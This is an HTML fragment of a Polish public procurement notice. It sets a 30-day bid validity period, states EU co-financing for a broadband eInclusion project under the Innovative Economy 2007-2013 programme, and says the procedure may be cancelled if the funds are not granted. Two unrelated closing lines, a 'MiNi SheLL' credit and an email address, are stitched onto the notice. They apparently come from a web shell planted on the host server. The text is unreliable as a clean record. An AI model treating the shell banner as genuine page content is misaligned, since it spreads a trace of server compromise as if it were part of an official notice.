<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego z  Projektu systemowego - działania na rzecz rozwoju szerokopasmowego dostępu do Internetu, realizowanego w ramach 8. Osi Priorytetowej: Społeczeństwo informacyjne-zwiększanie innowacyjności gospodarki Działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com